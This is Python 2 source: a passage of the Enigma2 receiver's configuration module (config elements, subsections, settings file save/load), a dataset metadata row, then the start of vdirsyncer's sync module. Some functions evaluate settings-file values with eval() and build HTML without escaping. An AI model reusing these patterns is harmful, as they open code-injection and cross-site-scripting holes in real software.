return "mtext"[1-selected:], self.text[self.offset:self.offset+self.visible_width].encode("utf-8")+" ", mark
else:
if self.allmarked:
mark = range(0, len(self.text))
else:
mark = [self.marked_pos]
return "mtext"[1-selected:], self.text.encode("utf-8")+" ", mark
def onSelect(self, session):
self.allmarked = (self.value != "")
if session is not None:
from Screens.NumericalTextInputHelpDialog import NumericalTextInputHelpDialog
self.help_window = session.instantiateDialog(NumericalTextInputHelpDialog, self)
self.help_window.setAnimationMode(0)
self.help_window.show()
def onDeselect(self, session):
self.marked_pos = 0
self.offset = 0
if self.help_window:
session.deleteDialog(self.help_window)
self.help_window = None
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
def getHTML(self, id):
return '<input type="text" name="' + id + '" value="' + self.value + '" /><br>\n'
def unsafeAssign(self, value):
self.value = str(value)
class ConfigPosition(ConfigSequence):
def __init__(self, default, args):
ConfigSequence.__init__(self, seperator = ",", limits = [(0,args[0]),(0,args[1]),(0,args[2]),(0,args[3])], default = default)
clock_limits = [(0,23),(0,59)]
class ConfigClock(ConfigSequence):
def __init__(self, default):
t = localtime(default)
ConfigSequence.__init__(self, seperator = ":", limits = clock_limits, default = [t.tm_hour, t.tm_min])
def increment(self):
# Check if Minutes maxed out
if self._value[1] == 59:
# Increment Hour, reset Minutes
if self._value[0] < 23:
self._value[0] += 1
else:
self._value[0] = 0
self._value[1] = 0
else:
# Increment Minutes
self._value[1] += 1
# Trigger change
self.changed()
def decrement(self):
# Check if Minutes is minimum
if self._value[1] == 0:
# Decrement Hour, set Minutes to 59
if self._value[0] > 0:
self._value[0] -= 1
else:
self._value[0] = 23
self._value[1] = 59
else:
# Decrement Minutes
self._value[1] -= 1
# Trigger change
self.changed()
integer_limits = (0, 9999999999)
class ConfigInteger(ConfigSequence):
def __init__(self, default, limits = integer_limits):
ConfigSequence.__init__(self, seperator = ":", limits = [limits], default = default)
# you need to override this to do input validation
def setValue(self, value):
self._value = [value]
self.changed()
def getValue(self):
return self._value[0]
value = property(getValue, setValue)
def fromstring(self, value):
return int(value)
def tostring(self, value):
return str(value)
class ConfigPIN(ConfigInteger):
def __init__(self, default, len = 4, censor = ""):
assert isinstance(default, int), "ConfigPIN default must be an integer"
ConfigSequence.__init__(self, seperator = ":", limits = [(0, (10**len)-1)], censor_char = censor, default = default)
self.len = len
def getLength(self):
return self.len
class ConfigFloat(ConfigSequence):
def __init__(self, default, limits):
ConfigSequence.__init__(self, seperator = ".", limits = limits, default = default)
def getFloat(self):
return float(self.value[1] / float(self.limits[1][1] + 1) + self.value[0])
float = property(getFloat)
# an editable text...
class ConfigText(ConfigElement, NumericalTextInput):
def __init__(self, default = "", fixed_size = True, visible_width = False):
ConfigElement.__init__(self)
NumericalTextInput.__init__(self, nextFunc = self.nextFunc, handleTimeout = False)
self.marked_pos = 0
self.allmarked = (default != "")
self.fixed_size = fixed_size
self.visible_width = visible_width
self.offset = 0
self.overwrite = fixed_size
self.help_window = None
self.value = self.last_value = self.default = default
def validateMarker(self):
textlen = len(self.text)
if self.fixed_size:
if self.marked_pos > textlen-1:
self.marked_pos = textlen-1
else:
if self.marked_pos > textlen:
self.marked_pos = textlen
if self.marked_pos < 0:
self.marked_pos = 0
if self.visible_width:
if self.marked_pos < self.offset:
self.offset = self.marked_pos
if self.marked_pos >= self.offset + self.visible_width:
if self.marked_pos == textlen:
self.offset = self.marked_pos - self.visible_width
else:
self.offset = self.marked_pos - self.visible_width + 1
if self.offset > 0 and self.offset + self.visible_width > textlen:
				self.offset = max(0, textlen - self.visible_width)
def insertChar(self, ch, pos, owr):
if owr or self.overwrite:
self.text = self.text[0:pos] + ch + self.text[pos + 1:]
elif self.fixed_size:
self.text = self.text[0:pos] + ch + self.text[pos:-1]
else:
self.text = self.text[0:pos] + ch + self.text[pos:]
def deleteChar(self, pos):
if not self.fixed_size:
self.text = self.text[0:pos] + self.text[pos + 1:]
elif self.overwrite:
self.text = self.text[0:pos] + " " + self.text[pos + 1:]
else:
self.text = self.text[0:pos] + self.text[pos + 1:] + " "
def deleteAllChars(self):
if self.fixed_size:
self.text = " " * len(self.text)
else:
self.text = ""
self.marked_pos = 0
def handleKey(self, key):
		# this will not change anything on the value itself
# so we can handle it here in gui element
if key == KEY_DELETE:
self.timeout()
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
else:
self.deleteChar(self.marked_pos)
if self.fixed_size and self.overwrite:
self.marked_pos += 1
elif key == KEY_BACKSPACE:
self.timeout()
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
elif self.marked_pos > 0:
self.deleteChar(self.marked_pos-1)
if not self.fixed_size and self.offset > 0:
self.offset -= 1
self.marked_pos -= 1
elif key == KEY_LEFT:
self.timeout()
if self.allmarked:
self.marked_pos = len(self.text)
self.allmarked = False
else:
self.marked_pos -= 1
elif key == KEY_RIGHT:
self.timeout()
if self.allmarked:
self.marked_pos = 0
self.allmarked = False
else:
self.marked_pos += 1
elif key == KEY_HOME:
self.timeout()
self.allmarked = False
self.marked_pos = 0
elif key == KEY_END:
self.timeout()
self.allmarked = False
self.marked_pos = len(self.text)
elif key == KEY_TOGGLEOW:
self.timeout()
self.overwrite = not self.overwrite
elif key == KEY_ASCII:
self.timeout()
newChar = unichr(getPrevAsciiCode())
if not self.useableChars or newChar in self.useableChars:
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
self.insertChar(newChar, self.marked_pos, False)
self.marked_pos += 1
elif key in KEY_NUMBERS:
owr = self.lastKey == getKeyNumber(key)
newChar = self.getKey(getKeyNumber(key))
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
self.insertChar(newChar, self.marked_pos, owr)
elif key == KEY_TIMEOUT:
self.timeout()
if self.help_window:
self.help_window.update(self)
return
if self.help_window:
self.help_window.update(self)
self.validateMarker()
self.changed()
def nextFunc(self):
self.marked_pos += 1
self.validateMarker()
self.changed()
def getValue(self):
try:
return self.text.encode("utf-8")
except UnicodeDecodeError:
print "Broken UTF8!"
return self.text
def setValue(self, val):
try:
self.text = val.decode("utf-8")
except UnicodeDecodeError:
self.text = val.decode("utf-8", "ignore")
print "Broken UTF8!"
value = property(getValue, setValue)
_value = property(getValue, setValue)
def getText(self):
return self.text.encode("utf-8")
def getMulti(self, selected):
if self.visible_width:
if self.allmarked:
mark = range(0, min(self.visible_width, len(self.text)))
else:
mark = [self.marked_pos-self.offset]
return "mtext"[1-selected:], self.text[self.offset:self.offset+self.visible_width].encode("utf-8")+" ", mark
else:
if self.allmarked:
mark = range(0, len(self.text))
else:
mark = [self.marked_pos]
return "mtext"[1-selected:], self.text.encode("utf-8")+" ", mark
def onSelect(self, session):
self.allmarked = (self.value != "")
if session is not None:
from Screens.NumericalTextInputHelpDialog import NumericalTextInputHelpDialog
self.help_window = session.instantiateDialog(NumericalTextInputHelpDialog, self)
self.help_window.setAnimationMode(0)
self.help_window.show()
def onDeselect(self, session):
self.marked_pos = 0
self.offset = 0
if self.help_window:
session.deleteDialog(self.help_window)
self.help_window = None
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
def getHTML(self, id):
return '<input type="text" name="' + id + '" value="' + self.value + '" /><br>\n'
def unsafeAssign(self, value):
self.value = str(value)
class ConfigPassword(ConfigText):
def __init__(self, default = "", fixed_size = False, visible_width = False, censor = "*"):
ConfigText.__init__(self, default = default, fixed_size = fixed_size, visible_width = visible_width)
self.censor_char = censor
self.hidden = True
def getMulti(self, selected):
mtext, text, mark = ConfigText.getMulti(self, selected)
if self.hidden:
text = len(text) * self.censor_char
return mtext, text, mark
def onSelect(self, session):
ConfigText.onSelect(self, session)
self.hidden = False
def onDeselect(self, session):
ConfigText.onDeselect(self, session)
self.hidden = True
# Lets the user select between [min, min+stepwidth, min+(stepwidth*2), ..., maxval],
# with maxval <= max depending on the stepwidth.
# min, max, stepwidth and default are int values.
# wraparound: if set to True, pressing the RIGHT key at the max value wraps around
# to the min value (and vice versa for LEFT at the min value).
class ConfigSelectionNumber(ConfigSelection):
def __init__(self, min, max, stepwidth, default = None, wraparound = False):
self.wraparound = wraparound
if default is None:
default = min
default = str(default)
choices = []
step = min
while step <= max:
choices.append(str(step))
step += stepwidth
ConfigSelection.__init__(self, choices, default)
def getValue(self):
return int(ConfigSelection.getValue(self))
def setValue(self, val):
ConfigSelection.setValue(self, str(val))
value = property(getValue, setValue)
def getIndex(self):
return self.choices.index(self.value)
index = property(getIndex)
def handleKey(self, key):
if not self.wraparound:
if key == KEY_RIGHT:
if len(self.choices) == (self.choices.index(str(self.value)) + 1):
return
if key == KEY_LEFT:
if self.choices.index(str(self.value)) == 0:
return
nchoices = len(self.choices)
if nchoices > 1:
i = self.choices.index(str(self.value))
if key == KEY_LEFT:
self.value = self.choices[(i + nchoices - 1) % nchoices]
elif key == KEY_RIGHT:
self.value = self.choices[(i + 1) % nchoices]
elif key == KEY_HOME:
self.value = self.choices[0]
elif key == KEY_END:
self.value = self.choices[nchoices - 1]
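# An illustrative sketch (not from the original file): a percentage selector in
# steps of five that wraps around at both ends.
#
#	volume = ConfigSelectionNumber(min=0, max=100, stepwidth=5, default=50, wraparound=True)
#	volume.handleKey(KEY_RIGHT)	# 50 -> 55
#	volume.handleKey(KEY_END)	# jumps to 100; another RIGHT wraps to 0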
class ConfigNumber(ConfigText):
def __init__(self, default = 0):
ConfigText.__init__(self, str(default), fixed_size = False)
def getValue(self):
return int(self.text)
def setValue(self, val):
self.text = str(val)
value = property(getValue, setValue)
_value = property(getValue, setValue)
def isChanged(self):
sv = self.saved_value
strv = self.tostring(self.value)
if sv is None and strv == self.default:
return False
return strv != sv
def conform(self):
pos = len(self.text) - self.marked_pos
self.text = self.text.lstrip("0")
if self.text == "":
self.text = "0"
if pos > len(self.text):
self.marked_pos = 0
else:
self.marked_pos = len(self.text) - pos
def handleKey(self, key):
if key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
ascii = getPrevAsciiCode()
if not (48 <= ascii <= 57):
return
else:
ascii = getKeyNumber(key) + 48
newChar = unichr(ascii)
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
self.insertChar(newChar, self.marked_pos, False)
self.marked_pos += 1
else:
ConfigText.handleKey(self, key)
self.conform()
def onSelect(self, session):
self.allmarked = (self.value != "")
def onDeselect(self, session):
self.marked_pos = 0
self.offset = 0
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
class ConfigSearchText(ConfigText):
def __init__(self, default = "", fixed_size = False, visible_width = False):
ConfigText.__init__(self, default = default, fixed_size = fixed_size, visible_width = visible_width)
NumericalTextInput.__init__(self, nextFunc = self.nextFunc, handleTimeout = False, search = True)
class ConfigDirectory(ConfigText):
def __init__(self, default="", visible_width=60):
ConfigText.__init__(self, default, fixed_size = True, visible_width = visible_width)
def handleKey(self, key):
pass
def getValue(self):
if self.text == "":
return None
else:
return ConfigText.getValue(self)
def setValue(self, val):
if val is None:
val = ""
ConfigText.setValue(self, val)
def getMulti(self, selected):
if self.text == "":
return "mtext"[1-selected:], _("List of storage devices"), range(0)
else:
return ConfigText.getMulti(self, selected)
def onSelect(self, session):
self.allmarked = (self.value != "")
# a slider.
class ConfigSlider(ConfigElement):
def __init__(self, default = 0, increment = 1, limits = (0, 100)):
ConfigElement.__init__(self)
self.value = self.last_value = self.default = default
self.min = limits[0]
self.max = limits[1]
self.increment = increment
def checkValues(self):
if self.value < self.min:
self.value = self.min
if self.value > self.max:
self.value = self.max
def handleKey(self, key):
if key == KEY_LEFT:
self.value -= self.increment
elif key == KEY_RIGHT:
self.value += self.increment
elif key == KEY_HOME:
self.value = self.min
elif key == KEY_END:
self.value = self.max
else:
return
self.checkValues()
def getText(self):
return "%d / %d" % (self.value, self.max)
def getMulti(self, selected):
self.checkValues()
return "slider", self.value, self.max
def fromstring(self, value):
return int(value)
# a satlist. in fact, it's a ConfigSelection.
class ConfigSatlist(ConfigSelection):
def __init__(self, list, default = None):
if default is not None:
default = str(default)
ConfigSelection.__init__(self, choices = [(str(orbpos), desc) for (orbpos, desc, flags) in list], default = default)
def getOrbitalPosition(self):
if self.value == "":
return None
return int(self.value)
orbital_position = property(getOrbitalPosition)
class ConfigSet(ConfigElement):
def __init__(self, choices, default=None):
if not default: default = []
ConfigElement.__init__(self)
if isinstance(choices, list):
choices.sort()
self.choices = choicesList(choices, choicesList.LIST_TYPE_LIST)
else:
assert False, "ConfigSet choices must be a list!"
self.pos = -1
default.sort()
self.last_value = self.default = default
self.value = default[:]
def toggleChoice(self, choice):
value = self.value
if choice in value:
value.remove(choice)
else:
value.append(choice)
value.sort()
self.changed()
def handleKey(self, key):
if key in KEY_NUMBERS + [KEY_DELETE, KEY_BACKSPACE]:
if self.pos != -1:
self.toggleChoice(self.choices[self.pos])
elif key == KEY_LEFT:
if self.pos < 0:
self.pos = len(self.choices)-1
else:
self.pos -= 1
elif key == KEY_RIGHT:
if self.pos >= len(self.choices)-1:
self.pos = -1
else:
self.pos += 1
elif key in (KEY_HOME, KEY_END):
self.pos = -1
def genString(self, lst):
res = ""
for x in lst:
res += self.description[x]+" "
return res
def getText(self):
return self.genString(self.value)
def getMulti(self, selected):
if not selected or self.pos == -1:
return "text", self.genString(self.value)
else:
tmp = self.value[:]
ch = self.choices[self.pos]
mem = ch in self.value
if not mem:
tmp.append(ch)
tmp.sort()
ind = tmp.index(ch)
val1 = self.genString(tmp[:ind])
val2 = " "+self.genString(tmp[ind+1:])
if mem:
chstr = " "+self.description[ch]+" "
else:
chstr = "("+self.description[ch]+")"
len_val1 = len(val1)
return "mtext", val1+chstr+val2, range(len_val1, len_val1 + len(chstr))
def onDeselect(self, session):
self.pos = -1
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value[:]
def tostring(self, value):
return str(value)
def fromstring(self, val):
return eval(val)
description = property(lambda self: descriptionList(self.choices.choices, choicesList.LIST_TYPE_LIST))
class ConfigLocations(ConfigElement):
def __init__(self, default=None, visible_width=False):
if not default: default = []
ConfigElement.__init__(self)
self.visible_width = visible_width
self.pos = -1
self.default = default
self.locations = []
self.mountpoints = []
self.value = default[:]
def setValue(self, value):
locations = self.locations
loc = [x[0] for x in locations if x[3]]
add = [x for x in value if not x in loc]
diff = add + [x for x in loc if not x in value]
locations = [x for x in locations if not x[0] in diff] + [[x, self.getMountpoint(x), True, True] for x in add]
#locations.sort(key = lambda x: x[0])
self.locations = locations
self.changed()
def getValue(self):
self.checkChangedMountpoints()
locations = self.locations
for x in locations:
x[3] = x[2]
return [x[0] for x in locations if x[3]]
value = property(getValue, setValue)
def tostring(self, value):
return str(value)
def fromstring(self, val):
return eval(val)
def load(self):
sv = self.saved_value
if sv is None:
tmp = self.default
else:
tmp = self.fromstring(sv)
locations = [[x, None, False, False] for x in tmp]
self.refreshMountpoints()
for x in locations:
if fileExists(x[0]):
x[1] = self.getMountpoint(x[0])
x[2] = True
self.locations = locations
def save(self):
locations = self.locations
if self.save_disabled or not locations:
self.saved_value = None
else:
self.saved_value = self.tostring([x[0] for x in locations])
def isChanged(self):
sv = self.saved_value
locations = self.locations
		if sv is None and not locations:
return False
return self.tostring([x[0] for x in locations]) != sv
def addedMount(self, mp):
for x in self.locations:
if x[1] == mp:
x[2] = True
elif x[1] is None and fileExists(x[0]):
x[1] = self.getMountpoint(x[0])
x[2] = True
def removedMount(self, mp):
for x in self.locations:
if x[1] == mp:
x[2] = False
def refreshMountpoints(self):
self.mountpoints = [p.mountpoint for p in harddiskmanager.getMountedPartitions() if p.mountpoint != "/"]
self.mountpoints.sort(key = lambda x: -len(x))
def checkChangedMountpoints(self):
oldmounts = self.mountpoints
self.refreshMountpoints()
newmounts = self.mountpoints
if oldmounts == newmounts:
return
for x in oldmounts:
if not x in newmounts:
self.removedMount(x)
for x in newmounts:
if not x in oldmounts:
self.addedMount(x)
def getMountpoint(self, file):
file = os_path.realpath(file)+"/"
for m in self.mountpoints:
if file.startswith(m):
return m
return None
def handleKey(self, key):
if key == KEY_LEFT:
self.pos -= 1
if self.pos < -1:
self.pos = len(self.value)-1
elif key == KEY_RIGHT:
self.pos += 1
if self.pos >= len(self.value):
self.pos = -1
elif key in (KEY_HOME, KEY_END):
self.pos = -1
def getText(self):
return " ".join(self.value)
def getMulti(self, selected):
if not selected:
valstr = " ".join(self.value)
if self.visible_width and len(valstr) > self.visible_width:
return "text", valstr[0:self.visible_width]
else:
return "text", valstr
else:
i = 0
valstr = ""
ind1 = 0
ind2 = 0
for val in self.value:
if i == self.pos:
ind1 = len(valstr)
valstr += str(val)+" "
if i == self.pos:
ind2 = len(valstr)
i += 1
if self.visible_width and len(valstr) > self.visible_width:
if ind1+1 < self.visible_width/2:
off = 0
else:
off = min(ind1+1-self.visible_width/2, len(valstr)-self.visible_width)
return "mtext", valstr[off:off+self.visible_width], range(ind1-off,ind2-off)
else:
return "mtext", valstr, range(ind1,ind2)
def onDeselect(self, session):
self.pos = -1
# nothing.
class ConfigNothing(ConfigSelection):
def __init__(self):
ConfigSelection.__init__(self, choices = [("","")])
# until here, 'saved_value' always had to be a *string*.
# now, in ConfigSubsection, and only there, saved_value
# is a dict, essentially forming a tree.
#
# config.foo.bar=True
# config.foobar=False
#
# turns into:
# config.saved_value == {"foo": {"bar": "True"}, "foobar": "False"}
#
class ConfigSubsectionContent(object):
pass
# we store a backup of the loaded configuration
# data in self.stored_values, to be able to deploy
# them when a new config element will be added,
# so non-default values are instantly available
# A list, for example:
# config.dipswitches = ConfigSubList()
# config.dipswitches.append(ConfigYesNo())
# config.dipswitches.append(ConfigYesNo())
# config.dipswitches.append(ConfigYesNo())
class ConfigSubList(list, object):
def __init__(self):
list.__init__(self)
self.stored_values = {}
def save(self):
for x in self:
x.save()
def load(self):
for x in self:
x.load()
def getSavedValue(self):
res = { }
for i, val in enumerate(self):
sv = val.saved_value
if sv is not None:
res[str(i)] = sv
return res
def setSavedValue(self, values):
self.stored_values = dict(values)
for (key, val) in self.stored_values.items():
if int(key) < len(self):
self[int(key)].saved_value = val
saved_value = property(getSavedValue, setSavedValue)
def append(self, item):
i = str(len(self))
list.append(self, item)
if i in self.stored_values:
item.saved_value = self.stored_values[i]
item.load()
def dict(self):
return dict([(str(index), value) for index, value in enumerate(self)])
# same as ConfigSubList, just as a dictionary.
# care must be taken that the 'key' has a proper
# str() method, because it will be used in the config
# file.
class ConfigSubDict(dict, object):
def __init__(self):
dict.__init__(self)
self.stored_values = {}
def save(self):
for x in self.values():
x.save()
def load(self):
for x in self.values():
x.load()
def getSavedValue(self):
res = {}
for (key, val) in self.items():
sv = val.saved_value
if sv is not None:
res[str(key)] = sv
return res
def setSavedValue(self, values):
self.stored_values = dict(values)
for (key, val) in self.items():
if str(key) in self.stored_values:
val.saved_value = self.stored_values[str(key)]
saved_value = property(getSavedValue, setSavedValue)
def __setitem__(self, key, item):
dict.__setitem__(self, key, item)
if str(key) in self.stored_values:
item.saved_value = self.stored_values[str(key)]
item.load()
def dict(self):
return self
# Like the classes above, just with a more "native"
# syntax.
#
# some evil stuff must be done to allow instant
# loading of added elements. this is why this class
# is so complex.
#
# we need the 'content' because we overwrite
# __setattr__.
# If you don't understand this, try adding
# __setattr__ to an ordinary existing class and you will.
class ConfigSubsection(object):
def __init__(self):
self.__dict__["content"] = ConfigSubsectionContent()
self.content.items = { }
self.content.stored_values = { }
def __setattr__(self, name, value):
if name == "saved_value":
return self.setSavedValue(value)
assert isinstance(value, (ConfigSubsection, ConfigElement, ConfigSubList, ConfigSubDict)), "ConfigSubsections can only store ConfigSubsections, ConfigSubLists, ConfigSubDicts or ConfigElements"
content = self.content
content.items[name] = value
x = content.stored_values.get(name, None)
if x is not None:
#print "ok, now we have a new item,", name, "and have the following value for it:", x
value.saved_value = x
value.load()
def __getattr__(self, name):
return self.content.items[name]
def getSavedValue(self):
res = self.content.stored_values
for (key, val) in self.content.items.items():
sv = val.saved_value
if sv is not None:
res[key] = sv
elif key in res:
del res[key]
return res
def setSavedValue(self, values):
values = dict(values)
self.content.stored_values = values
for (key, val) in self.content.items.items():
value = values.get(key, None)
if value is not None:
val.saved_value = value
saved_value = property(getSavedValue, setSavedValue)
def save(self):
for x in self.content.items.values():
x.save()
def load(self):
for x in self.content.items.values():
x.load()
def dict(self):
return self.content.items
# the root config object, which also can "pickle" (=serialize)
# down the whole config tree.
#
# we try to keep non-existing config entries, to apply them whenever
# a new config entry is added to a subsection
# also, non-existing config entries will be saved, so they won't be
# lost when a config entry disappears.
class Config(ConfigSubsection):
def __init__(self):
ConfigSubsection.__init__(self)
def pickle_this(self, prefix, topickle, result):
for (key, val) in topickle.items():
name = '.'.join((prefix, key))
if isinstance(val, dict):
self.pickle_this(name, val, result)
elif isinstance(val, tuple):
result += [name, '=', str(val[0]), '\n']
else:
result += [name, '=', str(val), '\n']
def pickle(self):
result = []
self.pickle_this("config", self.saved_value, result)
return ''.join(result)
def unpickle(self, lines, base_file=True):
tree = { }
configbase = tree.setdefault("config", {})
for l in lines:
if not l or l[0] == '#':
continue
result = l.split('=', 1)
if len(result) != 2:
continue
(name, val) = result
val = val.strip()
names = name.split('.')
base = configbase
for n in names[1:-1]:
base = base.setdefault(n, {})
base[names[-1]] = val
if not base_file: # not the initial config file..
#update config.x.y.value when exist
try:
configEntry = eval(name)
if configEntry is not None:
configEntry.value = val
except (SyntaxError, KeyError):
pass
# we inherit from ConfigSubsection, so ...
#object.__setattr__(self, "saved_value", tree["config"])
if "config" in tree:
self.setSavedValue(tree["config"])
def saveToFile(self, filename):
text = self.pickle()
try:
import os
f = open(filename + ".writing", "w")
f.write(text)
f.flush()
os.fsync(f.fileno())
f.close()
os.rename(filename + ".writing", filename)
except IOError:
print "Config: Couldn't write %s" % filename
def loadFromFile(self, filename, base_file=True):
self.unpickle(open(filename, "r"), base_file)
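# An illustrative sketch (not from the original file) of the settings-file
# format: pickle() flattens the saved_value tree into one dotted-path line per
# entry, which is exactly what unpickle() parses back via l.split('=', 1):
#
#	config.foo.bar=True
#	config.foobar=False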
config = Config()
config.misc = ConfigSubsection()
class ConfigFile:
def __init__(self):
pass
CONFIG_FILE = resolveFilename(SCOPE_CONFIG, "settings")
def load(self):
try:
config.loadFromFile(self.CONFIG_FILE, True)
print "Config file loaded ok..."
except IOError, e:
print "unable to load config (%s), assuming defaults..." % str(e)
def save(self):
# config.save()
config.saveToFile(self.CONFIG_FILE)
def __resolveValue(self, pickles, cmap):
key = pickles[0]
		if key in cmap:
if len(pickles) > 1:
return self.__resolveValue(pickles[1:], cmap[key].dict())
else:
return str(cmap[key].value)
return None
def getResolvedKey(self, key):
names = key.split('.')
if len(names) > 1:
if names[0] == "config":
ret=self.__resolveValue(names[1:], config.content.items)
if ret and len(ret):
return ret
print "getResolvedKey", key, "failed !! (Typo??)"
return ""
def NoSave(element):
element.disableSave()
return element
configfile = ConfigFile()
configfile.load()
def getConfigListEntry(*args):
assert len(args) > 1, "getConfigListEntry needs a minimum of two arguments (descr, configElement)"
return args
def updateConfigElement(element, newelement):
newelement.value = element.value
return newelement
#def _(x):
# return x
#
#config.bla = ConfigSubsection()
#config.bla.test = ConfigYesNo()
#config.nim = ConfigSubList()
#config.nim.append(ConfigSubsection())
#config.nim[0].bla = ConfigYesNo()
#config.nim.append(ConfigSubsection())
#config.nim[1].bla = ConfigYesNo()
#config.nim[1].blub = ConfigYesNo()
#config.arg = ConfigSubDict()
#config.arg["Hello"] = ConfigYesNo()
#
#config.arg["Hello"].handleKey(KEY_RIGHT)
#config.arg["Hello"].handleKey(KEY_RIGHT)
#
##config.saved_value
#
##configfile.save()
#config.save()
#print config.pickle()
cec_limits = [(0,15),(0,15),(0,15),(0,15)]
class ConfigCECAddress(ConfigSequence):
def __init__(self, default, auto_jump = False):
ConfigSequence.__init__(self, seperator = ".", limits = cec_limits, default = default)
self.block_len = [len(str(x[1])) for x in self.limits]
self.marked_block = 0
self.overwrite = True
self.auto_jump = auto_jump
def handleKey(self, key):
if key == KEY_LEFT:
if self.marked_block > 0:
self.marked_block -= 1
self.overwrite = True
elif key == KEY_RIGHT:
if self.marked_block < len(self.limits)-1:
self.marked_block += 1
self.overwrite = True
elif key == KEY_HOME:
self.marked_block = 0
self.overwrite = True
elif key == KEY_END:
self.marked_block = len(self.limits)-1
self.overwrite = True
elif key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
code = getPrevAsciiCode()
if code < 48 or code > 57:
return
number = code - 48
else:
number = getKeyNumber(key)
oldvalue = self._value[self.marked_block]
if self.overwrite:
self._value[self.marked_block] = number
self.overwrite = False
else:
oldvalue *= 10
newvalue = oldvalue + number
if self.auto_jump and newvalue > self.limits[self.marked_block][1] and self.marked_block < len(self.limits)-1:
self.handleKey(KEY_RIGHT)
self.handleKey(key)
return
else:
self._value[self.marked_block] = newvalue
if len(str(self._value[self.marked_block])) >= self.block_len[self.marked_block]:
self.handleKey(KEY_RIGHT)
self.validate()
self.changed()
def genText(self):
value = ""
block_strlen = []
for i in self._value:
block_strlen.append(len(str(i)))
if value:
value += self.seperator
value += str(i)
leftPos = sum(block_strlen[:self.marked_block])+self.marked_block
rightPos = sum(block_strlen[:(self.marked_block+1)])+self.marked_block
mBlock = range(leftPos, rightPos)
return value, mBlock
def getMulti(self, selected):
(value, mBlock) = self.genText()
if self.enabled:
return "mtext"[1-selected:], value, mBlock
else:
return "text", value
def getHTML(self, id):
# we definitely don't want leading zeros
return '.'.join(["%d" % d for d in self.value])
| gpl-2.0 | 3,419,506,302,964,417,000 | 25.720792 | 195 | 0.664166 | false |
untitaker/vdirsyncer | vdirsyncer/sync/__init__.py | 1 | 11708 | # -*- coding: utf-8 -*-
'''
The `sync` function in `vdirsyncer.sync` can be called on two instances of
`Storage` to synchronize them. Apart from the defined errors, this is the only
public API of this module.
The algorithm is based on the blogpost "How OfflineIMAP works" by Edward Z.
Yang: http://blog.ezyang.com/2012/08/how-offlineimap-works/
Some modifications to it are explained in
https://unterwaditzer.net/2016/sync-algorithm.html
'''
import contextlib
import itertools
import logging
from ..exceptions import UserError
from ..utils import uniq
from .status import SubStatus, ItemMetadata
from .exceptions import BothReadOnly, IdentAlreadyExists, PartialSync, \
StorageEmpty, SyncConflict
sync_logger = logging.getLogger(__name__)
class _StorageInfo(object):
'''A wrapper class that holds prefetched items, the status and other
things.'''
def __init__(self, storage, status):
self.storage = storage
self.status = status
self._item_cache = {}
def prepare_new_status(self):
storage_nonempty = False
prefetch = []
def _store_props(ident, props):
try:
self.status.insert_ident(ident, props)
except IdentAlreadyExists as e:
raise e.to_ident_conflict(self.storage)
for href, etag in self.storage.list():
storage_nonempty = True
ident, meta = self.status.get_by_href(href)
if meta is None or meta.href != href or meta.etag != etag:
# Either the item is completely new, or updated
# In both cases we should prefetch
prefetch.append(href)
else:
# Metadata is completely identical
_store_props(ident, meta)
# Prefetch items
for href, item, etag in (self.storage.get_multi(prefetch)
if prefetch else ()):
if not item.is_parseable:
sync_logger.warning(
'Storage "{}": item {} is malformed. '
'Please try to repair it.'
.format(self.storage.instance_name, href)
)
_store_props(item.ident, ItemMetadata(
href=href,
hash=item.hash,
etag=etag
))
self.set_item_cache(item.ident, item)
return storage_nonempty
def is_changed(self, ident):
old_meta = self.status.get(ident)
if old_meta is None: # new item
return True
new_meta = self.status.get_new(ident)
return (
new_meta.etag != old_meta.etag and # etag changed
# item actually changed
(old_meta.hash is None or new_meta.hash != old_meta.hash)
)
def set_item_cache(self, ident, item):
actual_hash = self.status.get_new(ident).hash
assert actual_hash == item.hash
self._item_cache[ident] = item
def get_item_cache(self, ident):
return self._item_cache[ident]
def sync(storage_a, storage_b, status, conflict_resolution=None,
force_delete=False, error_callback=None, partial_sync='revert'):
'''Synchronizes two storages.
:param storage_a: The first storage
:type storage_a: :class:`vdirsyncer.storage.base.Storage`
:param storage_b: The second storage
:type storage_b: :class:`vdirsyncer.storage.base.Storage`
:param status: {ident: (href_a, etag_a, href_b, etag_b)}
metadata about the two storages for detection of changes. Will be
modified by the function and should be passed to it at the next sync.
If this is the first sync, an empty dictionary should be provided.
:param conflict_resolution: A function that, given two conflicting item
versions A and B, returns a new item with conflicts resolved. The UID
must be the same. The strings `"a wins"` and `"b wins"` are also
accepted to mean that side's version will always be taken. If none
is provided, the sync function will raise :py:exc:`SyncConflict`.
:param force_delete: When one storage got completely emptied between two
syncs, :py:exc:`StorageEmpty` is raised for
safety. Setting this parameter to ``True`` disables this safety
measure.
:param error_callback: Instead of raising errors when executing actions,
call the given function with an `Exception` as the only argument.
:param partial_sync: What to do when doing sync actions on read-only
storages.
- ``error``: Raise an error.
- ``ignore``: Those actions are simply skipped.
- ``revert`` (default): Revert changes on other side.
'''
if storage_a.read_only and storage_b.read_only:
raise BothReadOnly()
if conflict_resolution == 'a wins':
conflict_resolution = lambda a, b: a
elif conflict_resolution == 'b wins':
conflict_resolution = lambda a, b: b
status_nonempty = bool(next(status.iter_old(), None))
with status.transaction():
a_info = _StorageInfo(storage_a, SubStatus(status, 'a'))
b_info = _StorageInfo(storage_b, SubStatus(status, 'b'))
a_nonempty = a_info.prepare_new_status()
b_nonempty = b_info.prepare_new_status()
if status_nonempty and not force_delete:
if a_nonempty and not b_nonempty:
raise StorageEmpty(empty_storage=storage_b)
elif not a_nonempty and b_nonempty:
raise StorageEmpty(empty_storage=storage_a)
actions = list(_get_actions(a_info, b_info))
storage_a.buffered()
storage_b.buffered()
for action in actions:
try:
action.run(
a_info,
b_info,
conflict_resolution,
partial_sync
)
except Exception as e:
if error_callback:
error_callback(e)
else:
raise
storage_a.flush()
storage_b.flush()
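# A minimal usage sketch (illustrative, not part of this module): storage_a and
# storage_b are assumed to be vdirsyncer Storage instances, and ``status`` an
# object providing the status interface used above (``transaction()``,
# ``iter_old()`` and per-side SubStatus access).
#
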